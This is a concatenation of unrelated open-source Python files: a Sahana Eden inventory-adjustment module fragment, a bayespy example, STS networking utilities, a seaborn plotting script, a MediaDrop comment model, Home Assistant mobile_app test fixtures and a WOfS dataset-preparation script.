label = T("Revised Value per Pack")),
s3_currency(readable = track_pack_values,
writable = track_pack_values),
Field("old_status", "integer",
label = T("Current Status"),
requires = IS_EMPTY_OR(IS_IN_SET(inv_item_status_opts)),
represent = lambda opt: \
inv_item_status_opts.get(opt, UNKNOWN_OPT),
default = 0,
writable = False),
Field("new_status", "integer",
label = T("Revised Status"),
requires = IS_EMPTY_OR(IS_IN_SET(inv_item_status_opts)),
represent = lambda opt: \
inv_item_status_opts.get(opt, UNKNOWN_OPT),
default = 0,),
s3_date("expiry_date",
label = T("Expiry Date")),
Field("bin", "string", length=16,
label = T("Bin"),
# @ToDo:
#widget = S3InvBinWidget("inv_adj_item")
),
# Organisation that owned this item before
organisation_id(name = "old_owner_org_id",
label = T("Current Owned By (Organization/Branch)"),
ondelete = "SET NULL",
writable = False),
# Organisation that owns this item now
organisation_id(name = "new_owner_org_id",
label = T("Transfer Ownership To (Organization/Branch)"),
ondelete = "SET NULL"),
adj_id(),
s3_comments(),
*s3_meta_fields())
# Reusable Field
adj_item_id = S3ReusableField("adj_item_id", "reference %s" % tablename,
label = T("Inventory Adjustment Item"),
ondelete = "RESTRICT",
represent = self.inv_adj_item_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "inv_adj_item.id",
self.inv_adj_item_represent,
orderby="inv_adj_item.item_id",
sort=True)),
sortby = "item_id",
)
# CRUD strings
crud_strings["inv_adj_item"] = Storage(
label_create = T("Add Item to Stock"),
title_display = T("Item Details"),
title_list = T("Items in Stock"),
title_update = T("Adjust Item Quantity"),
label_list_button = T("List Items in Stock"),
#label_delete_button = T("Remove Item from Stock"), # This should be forbidden - set qty to zero instead
msg_record_created = T("Item added to stock"),
msg_record_modified = T("Item quantity adjusted"),
#msg_record_deleted = T("Item removed from Stock"), # This should be forbidden - set qty to zero instead
msg_list_empty = T("No items currently in stock"))
return dict(inv_adj_item_id = adj_item_id,
)
# -------------------------------------------------------------------------
@staticmethod
def qnty_adj_repr(value):
"""
Make unadjusted quantities show up in bold
"""
if value is None:
return B(value)
else:
return value
# ---------------------------------------------------------------------
@staticmethod
def inv_adj_onaccept(form):
"""
When an adjustment record is created and it is of type inventory
then an adj_item record for each inv_inv_item in the site will be
created. If needed, extra adj_item records can be created later.
"""
id = form.vars.id
db = current.db
inv_item_table = db.inv_inv_item
adjitemtable = db.inv_adj_item
adjtable = db.inv_adj
adj_rec = adjtable[id]
if adj_rec.category == 1:
site_id = form.vars.site_id
# Only get inv. item with a positive quantity
query = (inv_item_table.site_id == site_id) & \
(inv_item_table.quantity > 0) & \
(inv_item_table.deleted == False)
            rows = db(query).select()
            for inv_item in rows:
# add an adjustment item record
adjitemtable.insert(reason = 0,
adj_id = id,
inv_item_id = inv_item.id, # original source inv_item
item_id = inv_item.item_id, # the supply item
item_pack_id = inv_item.item_pack_id,
old_quantity = inv_item.quantity,
currency = inv_item.currency,
old_status = inv_item.status,
new_status = inv_item.status,
old_pack_value = inv_item.pack_value,
new_pack_value = inv_item.pack_value,
expiry_date = inv_item.expiry_date,
bin = inv_item.bin,
old_owner_org_id = inv_item.owner_org_id,
new_owner_org_id = inv_item.owner_org_id,
)
# ---------------------------------------------------------------------
@staticmethod
def inv_adj_represent(id, row=None, show_link=True):
"""
Represent an Inventory Adjustment
"""
if row:
table = current.db.inv_adj
elif not id:
return current.messages["NONE"]
else:
db = current.db
table = db.inv_adj
row = db(table.id == id).select(table.adjustment_date,
table.adjuster_id,
limitby=(0, 1)).first()
try:
repr = "%s - %s" % (table.adjuster_id.represent(row.adjuster_id),
table.adjustment_date.represent(row.adjustment_date)
)
except:
return current.messages.UNKNOWN_OPT
else:
if show_link:
return SPAN(repr)
else:
return repr
# ---------------------------------------------------------------------
@staticmethod
def inv_adj_item_represent(id, row=None, show_link=True):
"""
Represent an Inventory Adjustment Item
"""
if row:
table = current.db.inv_adj_item
elif not id:
return current.messages["NONE"]
else:
db = current.db
table = db.inv_adj_item
row = db(table.id == id).select(table.item_id,
table.old_quantity,
table.new_quantity,
table.item_pack_id,
limitby=(0, 1)).first()
changed_quantity = 0
try:
if row.new_quantity and row.old_quantity:
changed_quantity = row.new_quantity - row.old_quantity
repr = "%s:%s %s" % (table.item_id.represent(row.item_id,
show_link=show_link),
changed_quantity,
table.item_pack_id.represent(row.item_pack_id),
)
except:
return current.messages.UNKNOWN_OPT
else:
if show_link:
return SPAN(repr)
else:
return repr
# =============================================================================
def inv_adj_rheader(r):
""" Resource Header for Inventory Adjustments """
if r.representation == "html" and r.name == "adj":
record = r.record
if record:
T = current.T
tabs = [(T("Edit Details"), None),
(T("Items"), "adj_item"),
(T("Photos"), "image"),
]
rheader_tabs = s3_rheader_tabs(r, tabs)
table = r.table
rheader = DIV(TABLE(
TR(TH("%s: " % table.adjuster_id.label),
table.adjuster_id.represent(record.adjuster_id),
TH("%s: " % table.adjustment_date.label),
table.adjustment_date.represent(record.adjustment_date),
),
TR(TH("%s: " % table.site_id.label),
table.site_id.represent(record.site_id),
TH("%s: " % table.category.label),
table.category.represent(record.category),
),
))
if record.status == 0: # In process
if current.auth.s3_has_permission("update", "inv_adj",
record_id=record.id):
# aitable = current.s3db.inv_adj_item
# query = (aitable.adj_id == record.id) & \
# (aitable.new_quantity == None)
# row = current.db(query).select(aitable.id,
# limitby=(0, 1)).first()
# if row == None:
close_btn = A( T("Complete Adjustment"),
_href = URL(c = "inv",
f = "adj_close",
args = [record.id]
),
_id = "adj_close",
_class = "action-btn"
)
close_btn_confirm = SCRIPT("S3.confirmClick('#adj_close', '%s')"
% T("Do you want to complete & close this adjustment?") )
rheader.append(close_btn)
rheader.append(close_btn_confirm)
rheader.append(rheader_tabs)
# else:
# msg = T("You need to check all the revised quantities before you can close this adjustment")
# rfooter.append(SPAN(msg))
return rheader
return None
# =============================================================================
# Generic function called by the duplicator methods to determine if the
# record already exists on the database.
def duplicator(job, query):
"""
This callback will be called when importing records it will look
to see if the record being imported is a duplicate.
@param job: An S3ImportJob object which includes all the details
of the record being imported
If the record is a duplicate then it will set the job method to update
"""
table = job.table
_duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if _duplicate:
job.id = _duplicate.id
job.data.id = _duplicate.id
job.method = job.METHOD.UPDATE
return _duplicate.id
return False
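# Typical usage (sketch - the resolver name and query are illustrative):
#
#   def inv_recv_duplicate(job):
#       """ Import deduplication for inv_recv """
#       table = job.table
#       query = (table.recv_ref == job.data.get("recv_ref"))
#       duplicator(job, query)
#
# i.e. a deduplicate callback builds a query that identifies an existing
# record, and duplicator() switches the import job to an UPDATE when a
# match is found.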
# =============================================================================
class inv_InvItemRepresent(S3Represent):
def __init__(self):
"""
Constructor
"""
super(inv_InvItemRepresent, self).__init__(lookup = "inv_inv_item")
# -------------------------------------------------------------------------
def lookup_rows(self, key, values, fields=[]):
"""
Custom rows lookup
@param key: the key Field
@param values: the values
@param fields: unused (retained for API compatibility)
"""
s3db = current.s3db
itable = s3db.inv_inv_item
stable = s3db.supply_item
left = stable.on(stable.id == itable.item_id)
if len(values) == 1:
query = (key == values[0])
else:
query = key.belongs(values)
rows = current.db(query).select(itable.id,
stable.name,
stable.um,
itable.item_source_no,
itable.bin,
itable.expiry_date,
itable.owner_org_id,
left=left)
self.queries += 1
# Bulk-represent owner_org_ids
organisation_id = str(itable.owner_org_id)
organisation_ids = [row[organisation_id] for row in rows]
if organisation_ids:
itable.owner_org_id.represent.bulk(organisation_ids)
return rows
# -------------------------------------------------------------------------
def represent_row(self, row):
"""
Represent a row
@param row: the Row
"""
itable = current.s3db.inv_inv_item
iitem = row.inv_inv_item
sitem = row.supply_item
stringify = lambda string: string if string else ""
ctn = stringify(iitem.item_source_no)
org = itable.owner_org_id.represent(iitem.owner_org_id)
bin = stringify(iitem.bin)
expires = iitem.expiry_date
if expires:
expires = "expires: %s" % \
S3DateTime.date_represent(expires, utc=True)
else:
expires = ""
NONE = current.messages["NONE"]
items = []
append = items.append
for string in [sitem.name, expires, ctn, org, bin]:
if string and string != NONE:
append(string)
append(" - ")
return TAG[""](items[:-1])
# END =========================================================================
|
import pandas as pd
import bayespy
from bayespy.network import Builder as builder
import logging
import os
import numpy as np
import scipy.stats as ss
import matplotlib.pyplot as plt
import seaborn as sns
def main():
logger = logging.getLogger()
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.INFO)
bayespy.jni.attach(logger)
db_folder = bayespy.utils.get_path_to_parent_dir(__file__)
iris = pd.read_csv(os.path.join(db_folder, "data/iris.csv"), index_col=False)
network = bayespy.network.create_network()
cluster = builder.create_cluster_variable(network, 4)
node = builder.create_multivariate_continuous_node(network, iris.drop('iris_class',axis=1).columns.tolist(), "joint")
builder.create_link(network, cluster, node)
class_variable = builder.create_discrete_variable(network, iris, 'iris_class', iris['iris_class'].unique())
builder.create_link(network, cluster, class_variable)
head_variables = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width']
with bayespy.data.DataSet(iris, db_folder, logger) as dataset:
model = bayespy.model.NetworkModel(network, logger)
model.train(dataset)
queries = [bayespy.model.QueryConditionalJointProbability(
head_variables=[v],
tail_variables=['iris_class']) for v in head_variables]
(engine, _, _) = bayespy.model.InferenceEngine(network).create()
query = bayespy.model.SingleQuery(network, engine, logger)
results = query.query(queries, aslist=True)
jd = bayespy.visual.JointDistribution()
fig = plt.figure(figsize=(10,10))
for i, r in enumerate(list(results)):
ax = fig.add_subplot(2, 2, i+1)
jd.plot_distribution_with_variance(ax, iris, queries[i].get_head_variables(), r)
plt.show()
if __name__ == "__main__":
main()
|
# Copyright 2011-2013 Colin Scott
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pox.openflow.software_switch import OFConnection
from pox.openflow.libopenflow_01 import ofp_flow_mod
from pox.lib.addresses import EthAddr, IPAddr
import time
import re
import os
import sys
import errno
import socket
import random
import types
import struct
import shutil
import base64
import subprocess
import warnings
import functools
import importlib
from sts.util.console import msg
# don't use the standard instance - we don't want to be seeded
true_random = random.Random()
def is_sorted(l):
return all(l[i] <= l[i+1] for i in xrange(len(l)-1))
def is_strictly_sorted(l):
return all(l[i] < l[i+1] for i in xrange(len(l)-1))
def timestamp_string():
return time.strftime("%Y_%m_%d_%H_%M_%S", time.localtime())
def find(f, seq):
"""Return first item in sequence where f(item) == True."""
for item in seq:
if f(item):
return item
def find_index(f, seq):
"""Return the index of the first item in sequence where f(item) == True."""
for index, item in enumerate(seq):
if f(item):
return index
def mkdir_p(dst):
try:
os.makedirs(dst)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(dst):
pass
else:
raise
def rm_rf(dst):
try:
if os.path.exists(dst):
shutil.rmtree(dst)
except OSError:
pass
def create_python_dir(results_dir):
mkdir_p(results_dir)
with file(results_dir + "/__init__.py", 'a'):
pass
def create_clean_python_dir(results_dir):
if os.path.exists(results_dir):
print >> sys.stderr, "Results dir %s already exists. Overwriting.." % results_dir
rm_rf(results_dir)
create_python_dir(results_dir)
def random_eth_addr():
return EthAddr(struct.pack("Q", true_random.randint(1,0xFF))[:6])
def random_ip_addr():
return IPAddr(true_random.randint(0,0xFFFFFFFF))
def address_is_ip(address):
return re.match("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", address)
def port_used(address='127.0.0.1', port=6633):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
s.bind((address, port))
s.listen(1)
s.close()
return False
except socket.error:
return True
def find_port(port_spec):
if isinstance(port_spec, xrange):
port_spec = list(port_spec)
port_gen = None
if isinstance(port_spec, int):
def port_gen():
yield port_spec
raise Exception("Fixed port %d is busy. Consider specifying a range or a lambda " % port_spec)
elif isinstance(port_spec, list):
def port_gen():
cands = list(port_spec)
true_random.shuffle(cands)
for c in cands:
yield c
raise Exception("Port list/range %s exhausted" % str(port_spec))
elif isinstance(port_spec, types.FunctionType) or isinstance(port_spec, types.LambdaType):
port_gen = port_spec
gen = port_gen()
for _ in range(0,100):
candidate = gen.next()
if not port_used(port=candidate):
return candidate
raise Exception("Could not find a port in 100 tries")
# TODO(cs): this function doesn't appear to be invoked?
def find_ports(**kwargs):
return { k : find_port(v) for k, v in kwargs.iteritems() }
class ExitCode(object):
def __init__(self, exit_code):
self.exit_code = exit_code
def base64_encode_raw(packet):
'''
  Encode already-packed bytes directly; calling pack() on an OpenFlow
  message might modify/add an XID.
'''
# base 64 occasionally adds extraneous newlines: bit.ly/aRTmNu
return base64.b64encode(packet).replace("\n", "")
def base64_encode(packet):
if hasattr(packet, "pack"):
packet = packet.pack()
# base 64 occasionally adds extraneous newlines: bit.ly/aRTmNu
return base64.b64encode(packet).replace("\n", "")
def base64_decode(data):
return base64.b64decode(data)
def base64_decode_openflow(data):
(msg, packet_length) = OFConnection.parse_of_packet(base64_decode(data))
return msg
def is_flow_mod(receive_event):
return type(base64_decode_openflow(receive_event.b64_packet)) == ofp_flow_mod
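# Example round-trip (illustrative):
#   fm = ofp_flow_mod()
#   b64 = base64_encode(fm)     # fm.pack() is called, then base64-encoded
#   raw = base64_decode(b64)    # -> the packed OpenFlow bytes
# base64_decode_openflow() instead re-parses the bytes into a message object,
# which is what is_flow_mod() uses to check the message type.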
class IPAddressSpace(object):
_claimed_addresses = set()
@staticmethod
def register_address(address):
if address in IPAddressSpace._claimed_addresses:
raise ValueError("Address %s already claimed" % address)
IPAddressSpace._claimed_addresses.add(address)
@staticmethod
def find_unclaimed_address(ip_prefix="192.168.1"):
''' Find an unclaimed IP address in the given /24 range (may be specified
as a full IP address for convenience).
'''
    octets = ip_prefix.split(".")
    if len(octets) == 4:
      ip_prefix = ".".join(octets[0:3])
    host_octet = 2
    address = "%s.%d" % (ip_prefix, host_octet)
    while host_octet <= 255 and address in IPAddressSpace._claimed_addresses:
      host_octet += 1
      address = "%s.%d" % (ip_prefix, host_octet)
if address in IPAddressSpace._claimed_addresses:
raise RuntimeError("Out of IP addresses in prefix %s" % ip_prefix)
return address
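# Example usage (illustrative):
#   IPAddressSpace.register_address("192.168.1.2")
#   IPAddressSpace.find_unclaimed_address("192.168.1")   # -> "192.168.1.3"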
def backtick(cmd, *args, **kwargs):
return subprocess.Popen(cmd, *args, shell=True, stdout=subprocess.PIPE, **kwargs).stdout.read().strip()
def system(cmd, *args, **kwargs):
return subprocess.call(cmd, *args, shell=True, **kwargs)
def show_flow_tables(simulation):
for switch in simulation.topology.switches:
msg.interactive("Switch %s" % switch.dpid)
switch.show_flow_table()
def deprecated(func):
"""
This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emitted
when the function is used.
Copied from https://wiki.python.org/moin/PythonDecoratorLibrary
"""
@functools.wraps(func)
def new_func(*args, **kwargs):
warnings.warn_explicit(
"Call to deprecated function {}.".format(func.__name__),
category=DeprecationWarning,
filename=func.func_code.co_filename,
lineno=func.func_code.co_firstlineno + 1
)
return func(*args, **kwargs)
return new_func
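# Illustrative usage sketch (not part of the original module): decorating a function
# emits a DeprecationWarning that points at the wrapped function's definition, e.g.
#
#   @deprecated
#   def old_helper():
#       return 42
#
#   old_helper()  # warns: "Call to deprecated function old_helper."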
def object_fullname(obj):
"""Return the fullname of an object"""
return obj.__module__ + "." + obj.__class__.__name__
def class_fullname(cls):
"""Return the fullname of a class"""
return cls.__module__ + "." + cls.__name__
def load_class(str_full_type):
"""
Load a python class given full qualified name.
"""
type_s = str_full_type.split('.')
mod = importlib.import_module('.'.join(type_s[:-1]))
cls = getattr(mod, type_s[-1])
return cls
def get_json_attr(obj):
"""
Returns the serialized version of the object if it has to_json() defined
"""
if hasattr(obj, "to_json"):
return getattr(obj, "to_json")()
else:
return obj
def base64_encode_flow(flow):
return None if flow is None else base64_encode(flow.to_flow_mod())
def base64_encode_flow_list(flows):
return None if flows is None else [base64_encode_flow(entry) for entry in flows]
def base64_encode_flow_table(flow_table):
return None if flow_table is None else base64_encode_flow_list(flow_table.table)
def get_port_no(obj):
"""
Try obj, obj.port_no, obj.port_no()
"""
if isinstance(obj, (basestring, int, long)):
return obj
if hasattr(obj, "port_no"):
port_no = getattr(obj, "port_no")
if isinstance(port_no, (basestring, int, long)):
return port_no
try:
port_no = port_no()
if isinstance(port_no, (basestring, int, long)):
return port_no
return str(port_no)
except:
return str(port_no)
return str(obj)
|
# coding: utf-8
#Import the libraries
import sys
from sys import argv
args = sys.argv
import numpy as np
import seaborn as sns
import matplotlib.pylab as plt
import pandas as pd
import matplotlib
#Customize background and pallete colors
sns.set_style("darkgrid")
filename = args[1]
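# Usage sketch (the script name here is illustrative): python plot_pathways.py completeness_table.tsv
# The first command-line argument is a tab-separated table whose first column is the row index
# (e.g. genome or sample IDs) and whose remaining columns are the pathway values renamed below.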
df = pd.read_table(filename, index_col=0, sep="\t")
df_comp=df.drop(['sulfur', 'carbon','oxygen','iron','nitrogen','<sulfur comp>', '<carbon comp>'],axis=1)
df_comp.rename(columns={'sulfur_1': 'Sulfite oxidation',
'sulfur_2':'Thiosulfate oxidation',
'sulfur_3':'Tetrathionate oxidation',
'sulfur_4':'Tetrathionate reduction',
'sulfur_5':'Sulfate reduction DS',
'sulfur_6':'Elemental sulfur reduction',
                        'sulfur_7':'Thiosulfate disproportionation',
'sulfur_8':'Carbon disulfide oxidation',
'sulfur_9':'Alkanesulfonate degradation',
'sulfur_10':'Sulfate reduction A',
'sulfur_11':'Sulfide oxidation',
'sulfur_12':'Cysteate oxidation',
'sulfur_13':'Dimethylsulfone oxidation',
'sulfur_14':'Sulfoacetate oxidation',
'sulfur_15':'Sulfolactate oxidation',
'sulfur_16':'DMS oxidation',
'sulfur_17':'DMSP oxidation',
'sulfur_18':'MTP oxidation',
                        'sulfur_19':'Sulfoacetaldehyde oxidation',
                        'sulfur_20':'Elemental sulfur oxidation',
                        'sulfur_21':'Elemental sulfur disproportionation',
'sulfur_22':'Methanesulfonate oxidation',
'sulfur_23':'Taurine oxidation',
'sulfur_24':'DMS methanogenesis',
                        'sulfur_25':'MTP methanogenesis',
'sulfur_26':'Methanethiol methanogenesis',
'sulfur_27':'Homotaurine degradation',
'sulfur_28':'SQDG biosynthesis',
'sulfur_29':'Marker genes',
'carbon_1':'coenzyme B/coenzyme M regeneration I (methanophenazine-dependent)',
'carbon_2': 'Methane oxidation, methanotroph, methane => formaldehyde',
'carbon_3': 'methanogenesis energy conservation',
'carbon_4': 'Methanogenesis, acetate => methane (M00357)',
'carbon_5':'Methanogenesis, methylamine/dimethylamine/trimethylamine => methane',
                        'carbon_6':'Methanogenesis from dimethylsulfide/methanethiol/methylthiopropanoate => methane',
'carbon_7':'Methanogenesis, CO2 => methane',
'carbon_8':'methanogenesis from acetate reductive acetyl coenzyme A pathway II (autotrophic methanogens)',
'carbon_9':'Methanogenesis, methanol => methane',
'carbon_10':'methylamine degradation',
'carbon_12':'methyl-coenzyme M oxidation to CO2',
'carbon_13':'methyl-coenzyme M reduction to methane' },inplace=True)
df_comp=df_comp.T
sns.set(font_scale=1)
axs = sns.clustermap(df_comp, col_cluster=True, linewidths=0.6,cmap=sns.color_palette("RdBu_r", 100),
figsize=(15,12))
plt.tight_layout()
plt.savefig(argv[1]+".png", bbox_inches='tight', dpi=500)
plt.close()
|
#!/usr/bin/python3
#
# Copyright (C) 2015-2019 Sustainable Energy Now Inc., Angus King
#
# getparents.py - This file is part of SIREN.
#
# SIREN is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
#
# SIREN is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General
# Public License along with SIREN. If not, see
# <http://www.gnu.org/licenses/>.
#
def getParents(aparents):
parents = []
for key, value in aparents:
for key2, value2 in aparents:
if key2 == key:
continue
value = value.replace(key2, value2)
for key2, value2 in parents:
if key2 == key:
continue
value = value.replace(key2, value2)
parents.append((key, value))
return parents
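# Illustrative example (not part of the original file): each value has every other key
# substituted, first from the raw input and then from already-resolved parents, so later
# entries can reference earlier ones symbolically:
#
#   getParents([('$BASE', '/data'), ('$GRID', '$BASE/grids')])
#   # -> [('$BASE', '/data'), ('$GRID', '/data/grids')]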
|
# This file is a part of MediaDrop (http://www.mediadrop.net),
# Copyright 2009-2013 MediaCore Inc., Felix Schwarz and other contributors.
# For the exact contribution history, see the git revision log.
# The source code contained in this file is licensed under the GPLv3 or
# (at your option) any later version.
# See LICENSE.txt in the main project directory, for more information.
"""
Comment Model
Comments come with two status flags:
* reviewed
* publishable
"""
from datetime import datetime
from sqlalchemy import Table, ForeignKey, Column, sql
from sqlalchemy.types import BigInteger, Boolean, DateTime, Integer, Unicode, UnicodeText
from sqlalchemy.orm import mapper, relation, backref, synonym, composite, column_property, validates, interfaces, \
Query, dynamic_loader
from mediacore.model import AuthorWithIP
from mediacore.model.meta import DBSession, metadata
from mediacore.plugin import events
comments = Table('comments', metadata,
Column('id', Integer, autoincrement=True, primary_key=True),
Column('media_id', Integer, ForeignKey('media.id', onupdate='CASCADE', ondelete='CASCADE')),
Column('comment_id', Integer, ForeignKey('comments.id', onupdate='CASCADE', ondelete='CASCADE')),
Column('subject', Unicode(100)),
Column('created_on', DateTime, default=datetime.now, nullable=False),
Column('modified_on', DateTime, default=datetime.now, onupdate=datetime.now, nullable=False),
Column('reviewed', Boolean, default=False, nullable=False),
Column('publishable', Boolean, default=False, nullable=False),
Column('author_name', Unicode(50), nullable=False),
Column('author_email', Unicode(255)),
Column('author_ip', BigInteger, nullable=False),
Column('body', UnicodeText, nullable=False),
Column('level', Integer, nullable=False, default=0),
mysql_engine='InnoDB',
mysql_charset='utf8',
)
class CommentQuery(Query):
def published(self, flag=True):
return self.filter(Comment.publishable == flag)
def reviewed(self, flag=True):
return self.filter(Comment.reviewed == flag)
def trash(self, flag=True):
filter = sql.and_(Comment.reviewed == True,
Comment.publishable == False)
if flag:
return self.filter(filter)
else:
return self.filter(sql.not_(filter))
def subcomment(self, comment_id=None):
return self.published().filter(Comment.comment_id == comment_id)
def search(self, q):
q = '%' + q + '%'
return self.filter(sql.or_(
Comment.subject.like(q),
Comment.body.like(q),
))
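# Illustrative usage sketch (not part of the original model): CommentQuery is attached to
# Comment.query below, so the two status flags combine into the usual moderation views:
#
#   Comment.query.reviewed(False)   # awaiting moderation
#   Comment.query.published()       # publishable comments
#   Comment.query.trash()           # reviewed but not publishable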
class Comment(object):
"""Comment Model
.. attribute:: type
The relation name to use when looking up the parent object of this Comment.
This is the name of the backref property which can be used to find the
object that this Comment belongs to. Our convention is to have a controller
by this name, with a 'view' action which accepts a slug, so we can
auto-generate links to any comment's parent.
.. attribute:: author
An instance of :class:`mediacore.model.author.AuthorWithIP`.
"""
query = DBSession.query_property(CommentQuery)
def __repr__(self):
return '<Comment: %r subject=%r>' % (self.id, self.subject)
def __unicode__(self):
return self.subject
@property
def type(self):
if self.media_id:
return 'media'
return None
def _get_parent(self):
return self.media or None
def _set_parent(self, parent):
self.media = parent
parent = property(_get_parent, _set_parent, None, """
The object this Comment belongs to, provided for convenience mostly.
If the parent has not been eagerloaded, a query is executed automatically.
""")
mapper(Comment, comments, order_by=comments.c.created_on, extension=events.MapperObserver(events.Comment), properties={
'author': composite(AuthorWithIP,
comments.c.author_name,
comments.c.author_email,
comments.c.author_ip),
'comments': dynamic_loader(
Comment,
# backref='comment',
query_class=CommentQuery,
passive_deletes=True,
doc="""A query pre-filtered for associated comments.
Returns :class:`mediacore.model.comments.CommentQuery`."""
),
})
|
"""Tests for mobile_app component."""
# pylint: disable=redefined-outer-name,unused-import
import pytest
from homeassistant.components.mobile_app.const import DOMAIN
from homeassistant.setup import async_setup_component
from .const import REGISTER, REGISTER_CLEARTEXT
@pytest.fixture
async def create_registrations(hass, authed_api_client):
"""Return two new registrations."""
await async_setup_component(hass, DOMAIN, {DOMAIN: {}})
enc_reg = await authed_api_client.post(
"/api/mobile_app/registrations", json=REGISTER
)
assert enc_reg.status == 201
enc_reg_json = await enc_reg.json()
clear_reg = await authed_api_client.post(
"/api/mobile_app/registrations", json=REGISTER_CLEARTEXT
)
assert clear_reg.status == 201
clear_reg_json = await clear_reg.json()
await hass.async_block_till_done()
return (enc_reg_json, clear_reg_json)
@pytest.fixture
async def push_registration(hass, authed_api_client):
"""Return registration with push notifications enabled."""
await async_setup_component(hass, DOMAIN, {DOMAIN: {}})
enc_reg = await authed_api_client.post(
"/api/mobile_app/registrations",
json={
**REGISTER,
"app_data": {
"push_url": "http://localhost/mock-push",
"push_token": "abcd",
},
},
)
assert enc_reg.status == 201
return await enc_reg.json()
@pytest.fixture
async def webhook_client(hass, authed_api_client, aiohttp_client):
"""mobile_app mock client."""
# We pass in the authed_api_client server instance because
# it is used inside create_registrations and just passing in
# the app instance would cause the server to start twice,
# which caused deprecation warnings to be printed.
return await aiohttp_client(authed_api_client.server)
@pytest.fixture
async def authed_api_client(hass, hass_client):
"""Provide an authenticated client for mobile_app to use."""
await async_setup_component(hass, DOMAIN, {DOMAIN: {}})
await hass.async_block_till_done()
return await hass_client()
@pytest.fixture(autouse=True)
async def setup_ws(hass):
"""Configure the websocket_api component."""
assert await async_setup_component(hass, "websocket_api", {})
await hass.async_block_till_done()
|
#!/bin/env python
# coding=utf-8
"""
Ingest data from the command-line.
' '.join(['{}_{}'.format(x, y) for x in range(138, 140+1) for y in range(-31, -33-1, -1)])
138_-31 138_-32 138_-33 139_-31 139_-32 139_-33 140_-31 140_-32 140_-33
for i in 138_-031 138_-032 138_-033 139_-031 139_-032 139_-033 140_-031 140_-032 140_-033
do
oldwofs_prepare.py --output oldwofs_${i}.yaml /g/data/fk4/wofs/current/extents/${i}/*.tif
done
"""
from __future__ import absolute_import
import uuid
import click
import netCDF4
import rasterio
import yaml
from yaml import CDumper
from datetime import datetime
# Assumption: 'parse' (used in prepare_datasets_netcdf below) refers to dateutil's date parser.
from dateutil.parser import parse
import re
from pathlib import Path
from concurrent.futures import ThreadPoolExecutor, as_completed, ProcessPoolExecutor
def prepare_datasets_netcdf(nc_file):
"""
    Don't use this: it turns out the old WOfS NetCDFs have an 'alternative' structure and
    can't be opened by GDAL/rasterio.
"""
image = netCDF4.Dataset(nc_file)
times = image['time']
projection = 'EPSG:4326'
x, dx, _, y, _, dy = (float(n) for n in image['crs'].GeoTransform)
left, right = x, x + dx * len(image['longitude'])
bottom, top = y + dy * len(image['latitude']), y
class CountableGenerator(object):
def __len__(self):
return len(times)
def __iter__(self):
for time in times:
sensing_time = netCDF4.num2date(time, units=times.units, calendar=times.calendar).isoformat()
yield {
'id': str(uuid.uuid4()),
'product_type': 'old_wofs',
'creation_dt': parse(image.date_created).isoformat(),
'platform': {'code': 'LANDSAT'},
'extent': {
'coord': {
'ul': {'lon': left, 'lat': top},
'ur': {'lon': right, 'lat': top},
'll': {'lon': left, 'lat': bottom},
'lr': {'lon': right, 'lat': bottom},
},
'from_dt': sensing_time,
'to_dt': sensing_time,
'center_dt': sensing_time
},
'format': {'name': 'NETCDF'},
'grid_spatial': {
'projection': {
'spatial_reference': projection,
'geo_ref_points': {
'ul': {'x': left, 'y': top},
'ur': {'x': right, 'y': top},
'll': {'x': left, 'y': bottom},
'lr': {'x': right, 'y': bottom},
},
# 'valid_data'
}
},
'image': {
'bands': {
'water': {
'path': str(Path(nc_file).absolute()),
'layer': 'Data',
}
}
},
'lineage': {'source_datasets': {}},
}
return CountableGenerator()
def prepare_datasets_geotiff(geotiff_file):
with rasterio.open(geotiff_file) as image:
file_path = Path(geotiff_file)
projection = image.crs['init']
left, bottom, right, top = image.bounds
# Calc sensing time
sensing_time = datetime(*[int(d)
for d in re.split(r'[-T]',
re.findall(r'\d\d\d\d-[\d\-T]+', geotiff_file)[0])])
creation_time = datetime.fromtimestamp(file_path.stat().st_ctime)
return {
'id': str(uuid.uuid4()),
'product_type': 'old_wofs',
'creation_dt': creation_time,
'platform': {'code': 'LANDSAT'},
'extent': {
'coord': {
'ul': {'lon': left, 'lat': top},
'ur': {'lon': right, 'lat': top},
'll': {'lon': left, 'lat': bottom},
'lr': {'lon': right, 'lat': bottom},
},
'from_dt': sensing_time,
'to_dt': sensing_time,
'center_dt': sensing_time
},
'format': {'name': str(image.driver)},
'grid_spatial': {
'projection': {
'spatial_reference': projection,
'geo_ref_points': {
'ul': {'x': left, 'y': top},
'ur': {'x': right, 'y': top},
'll': {'x': left, 'y': bottom},
'lr': {'x': right, 'y': bottom},
},
# 'valid_data'
}
},
'image': {
'bands': {
'water': {
'path': str(file_path.absolute()),
'layer': '1',
}
}
},
'lineage': {'source_datasets': {}},
}
@click.command(help="Prepare old WOfS tiles for ingestion into the Data Cube.")
@click.argument('datasets',
type=click.Path(exists=True, readable=True),
nargs=-1)
@click.option('--output', help="Write datasets into this file",
type=click.Path(exists=False, writable=True))
def main(datasets, output):
with open(output, 'w') as stream:
with ProcessPoolExecutor(max_workers=4) as executor:
output_datasets = executor.map(prepare_datasets_geotiff, datasets)
# output_datasets = (executor.submit(prepare_datasets_geotiff, dataset)
# for dataset in datasets)
with click.progressbar(output_datasets,
length=len(datasets),
label='Loading datasets') as progress_bar_datasets:
yaml.dump_all(progress_bar_datasets, stream, Dumper=CDumper)
if __name__ == "__main__":
main()
|
# Author: Nic Wolfe <[email protected]>
